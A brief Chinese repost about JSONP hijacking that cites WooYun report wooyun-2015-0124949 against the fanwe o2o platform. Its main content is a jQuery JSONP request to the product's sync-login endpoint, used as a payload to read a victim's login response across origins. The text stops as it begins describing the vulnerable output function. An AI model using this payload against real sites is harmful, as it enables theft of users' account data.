前端之家收集整理的这篇文章主要介绍了
jsonp劫持,
前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。
基础:
说说JSON和JSONP,也许你会豁然开朗,含jQuery用例
JSONP 安全攻防技术
案例:
payload:
$.ajax({type:"get",url:"http://o2odemo.fanwe.net/mapi/index.PHP?ctl=synclogin&act=index&login_type=Sina&sina_id=ooooo&access_token=ooooo&r_type=3&callback=wooyun",dataType:"jsonp",jsonp:"callback",success:function(json){console.log(json);}});
wooyun-2015-0124949
/mapi/Lib/core/common.PHP中有 fanwe o2o的output函数: